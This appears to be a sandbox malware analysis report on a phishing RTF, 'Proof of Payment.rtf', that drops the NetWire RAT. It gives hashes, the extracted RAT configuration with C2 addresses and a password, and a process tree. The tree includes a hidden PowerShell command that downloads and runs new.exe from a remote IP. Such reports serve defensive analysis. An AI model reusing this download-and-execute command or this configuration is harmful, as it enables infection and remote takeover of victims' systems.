Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20220414-en -
resource tags
arch:x64arch:x86image:win7-20220414-enlocale:en-usos:windows7-x64system -
submitted
15-07-2022 11:54
Static task
static1
Behavioral task
behavioral1
Sample
Proof of Payment.rtf
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
Proof of Payment.rtf
Resource
win10v2004-20220414-en
General
-
Target
Proof of Payment.rtf
-
Size
230KB
-
MD5
ccb4d123d7d23778dc3b804f8b4c551a
-
SHA1
6abaeacc98255a7a8048f0a62a7b983720c904da
-
SHA256
c4155eb3caee31efbcf7672f25c39e875b81bba26400cf0c4d4840e534491122
-
SHA512
0ae4ac069b843d2bb45064a29fed582970d15621135ef5b584f10d7aee6be71a049085f317161eb3980cc05efcd65d1c3aefb98c3bd1a1139286d03934367cca
Malware Config
Extracted
http://192.3.194.246/new.exe
Extracted
netwire
194.5.98.188:3364
194.5.98.188:3366
-
activex_autorun
false
-
copy_executable
false
-
delete_original
false
-
host_id
HostId-%Rand%
-
keylogger_dir
%AppData%\Logs\
-
lock_executable
false
-
offline_keylogger
true
-
password
j5m52xuc
-
registry_autorun
false
-
use_mutex
false
Signatures
-
NetWire RAT payload 12 IoCs
Processes:
resource yara_rule behavioral1/memory/1880-124-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/1880-125-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/1880-123-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/1880-127-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/1880-128-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/1880-129-0x000000000040242D-mapping.dmp netwire behavioral1/memory/1880-132-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/1880-133-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/676-152-0x000000000040242D-mapping.dmp netwire behavioral1/memory/1608-168-0x000000000040242D-mapping.dmp netwire behavioral1/memory/676-172-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/1608-173-0x0000000000400000-0x0000000000433000-memory.dmp netwire -
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.execmd.exepowershell.execmd.exepowershell.execmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1052 1048 powershell.exe WINWORD.EXE Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1504 1048 cmd.exe WINWORD.EXE Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1300 1048 powershell.exe WINWORD.EXE Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2020 1048 cmd.exe WINWORD.EXE Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1464 1048 powershell.exe WINWORD.EXE Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1160 1048 cmd.exe WINWORD.EXE -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1052 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
new.exenew.exenew.exepid process 1548 new.exe 1344 new.exe 1676 new.exe -
Loads dropped DLL 3 IoCs
Processes:
cmd.execmd.execmd.exepid process 1504 cmd.exe 2020 cmd.exe 1160 cmd.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
new.exenew.exenew.exedescription pid process target process PID 1548 set thread context of 1880 1548 new.exe InstallUtil.exe PID 1344 set thread context of 676 1344 new.exe InstallUtil.exe PID 1676 set thread context of 1608 1676 new.exe InstallUtil.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1048 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exenew.exenew.exenew.exepid process 1052 powershell.exe 1772 powershell.exe 1300 powershell.exe 1464 powershell.exe 544 powershell.exe 1916 powershell.exe 1548 new.exe 1548 new.exe 1344 new.exe 1344 new.exe 1676 new.exe 1676 new.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exenew.exepowershell.exepowershell.exenew.exepowershell.exenew.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1052 powershell.exe Token: SeDebugPrivilege 1548 new.exe Token: SeDebugPrivilege 1772 powershell.exe Token: SeDebugPrivilege 1300 powershell.exe Token: SeDebugPrivilege 1344 new.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeDebugPrivilege 1676 new.exe Token: SeDebugPrivilege 544 powershell.exe Token: SeDebugPrivilege 1916 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
WINWORD.EXEpid process 1048 WINWORD.EXE 1048 WINWORD.EXE 1048 WINWORD.EXE 1048 WINWORD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WINWORD.EXEcmd.exenew.execmd.execmd.exenew.exenew.exedescription pid process target process PID 1048 wrote to memory of 1052 1048 WINWORD.EXE powershell.exe PID 1048 wrote to memory of 1052 1048 WINWORD.EXE powershell.exe PID 1048 wrote to memory of 1052 1048 WINWORD.EXE powershell.exe PID 1048 wrote to memory of 1052 1048 WINWORD.EXE powershell.exe PID 1048 wrote to memory of 1504 1048 WINWORD.EXE cmd.exe PID 1048 wrote to memory of 1504 1048 WINWORD.EXE cmd.exe PID 1048 wrote to memory of 1504 1048 WINWORD.EXE cmd.exe PID 1048 wrote to memory of 1504 1048 WINWORD.EXE cmd.exe PID 1504 wrote to memory of 1548 1504 cmd.exe new.exe PID 1504 wrote to memory of 1548 1504 cmd.exe new.exe PID 1504 wrote to memory of 1548 1504 cmd.exe new.exe PID 1504 wrote to memory of 1548 1504 cmd.exe new.exe PID 1504 wrote to memory of 1548 1504 cmd.exe new.exe PID 1504 wrote to memory of 1548 1504 cmd.exe new.exe PID 1504 wrote to memory of 1548 1504 cmd.exe new.exe PID 1548 wrote to memory of 1772 1548 new.exe powershell.exe PID 1548 wrote to memory of 1772 1548 new.exe powershell.exe PID 1548 wrote to memory of 1772 1548 new.exe powershell.exe PID 1548 wrote to memory of 1772 1548 new.exe powershell.exe PID 1048 wrote to memory of 1300 1048 WINWORD.EXE powershell.exe PID 1048 wrote to memory of 1300 1048 WINWORD.EXE powershell.exe PID 1048 wrote to memory of 1300 1048 WINWORD.EXE powershell.exe PID 1048 wrote to memory of 1300 1048 WINWORD.EXE powershell.exe PID 1048 wrote to memory of 2020 1048 WINWORD.EXE cmd.exe PID 1048 wrote to memory of 2020 1048 WINWORD.EXE cmd.exe PID 1048 wrote to memory of 2020 1048 WINWORD.EXE cmd.exe PID 1048 wrote to memory of 2020 1048 WINWORD.EXE cmd.exe PID 2020 wrote to memory of 1344 2020 cmd.exe new.exe PID 2020 wrote to memory of 1344 2020 cmd.exe new.exe PID 2020 wrote to memory of 1344 2020 cmd.exe new.exe PID 2020 wrote to memory of 1344 2020 cmd.exe new.exe PID 2020 wrote to memory of 1344 2020 cmd.exe new.exe PID 2020 wrote to memory of 1344 2020 cmd.exe new.exe PID 2020 wrote to memory of 1344 2020 cmd.exe new.exe PID 1048 wrote to memory of 1464 1048 WINWORD.EXE powershell.exe PID 1048 wrote to memory of 1464 1048 WINWORD.EXE powershell.exe PID 1048 wrote to memory of 1464 1048 WINWORD.EXE powershell.exe PID 1048 wrote to memory of 1464 1048 WINWORD.EXE powershell.exe PID 1048 wrote to memory of 1160 1048 WINWORD.EXE cmd.exe PID 1048 wrote to memory of 1160 1048 WINWORD.EXE cmd.exe PID 1048 wrote to memory of 1160 1048 WINWORD.EXE cmd.exe PID 1048 wrote to memory of 1160 1048 WINWORD.EXE cmd.exe PID 1160 wrote to memory of 1676 1160 cmd.exe new.exe PID 1160 wrote to memory of 1676 1160 cmd.exe new.exe PID 1160 wrote to memory of 1676 1160 cmd.exe new.exe PID 1160 wrote to memory of 1676 1160 cmd.exe new.exe PID 1160 wrote to memory of 1676 1160 cmd.exe new.exe PID 1160 wrote to memory of 1676 1160 cmd.exe new.exe PID 1160 wrote to memory of 1676 1160 cmd.exe new.exe PID 1344 wrote to memory of 544 1344 new.exe powershell.exe PID 1344 wrote to memory of 544 1344 new.exe powershell.exe PID 1344 wrote to memory of 544 1344 new.exe powershell.exe PID 1344 wrote to memory of 544 1344 new.exe powershell.exe PID 1676 wrote to memory of 1916 1676 new.exe powershell.exe PID 1676 wrote to memory of 1916 1676 new.exe powershell.exe PID 1676 wrote to memory of 1916 1676 new.exe powershell.exe PID 1676 wrote to memory of 1916 1676 new.exe powershell.exe PID 1548 wrote to memory of 1880 1548 new.exe InstallUtil.exe PID 1548 wrote to memory of 1880 1548 new.exe InstallUtil.exe PID 1548 wrote to memory of 1880 1548 new.exe InstallUtil.exe PID 1548 wrote to memory of 1880 1548 new.exe InstallUtil.exe PID 1548 wrote to memory of 1880 1548 new.exe InstallUtil.exe PID 1548 wrote to memory of 1880 1548 new.exe InstallUtil.exe PID 1548 wrote to memory of 1880 1548 new.exe InstallUtil.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Proof of Payment.rtf"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.246/new.exe','C:\Users\Admin\AppData\Roaming\new.exe')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\new.exe2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Users\Admin\AppData\Roaming\new.exeC:\Users\Admin\AppData\Roaming\new.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵PID:1880
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.246/new.exe','C:\Users\Admin\AppData\Roaming\new.exe')2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\new.exe2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Users\Admin\AppData\Roaming\new.exeC:\Users\Admin\AppData\Roaming\new.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:544 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵PID:676
-
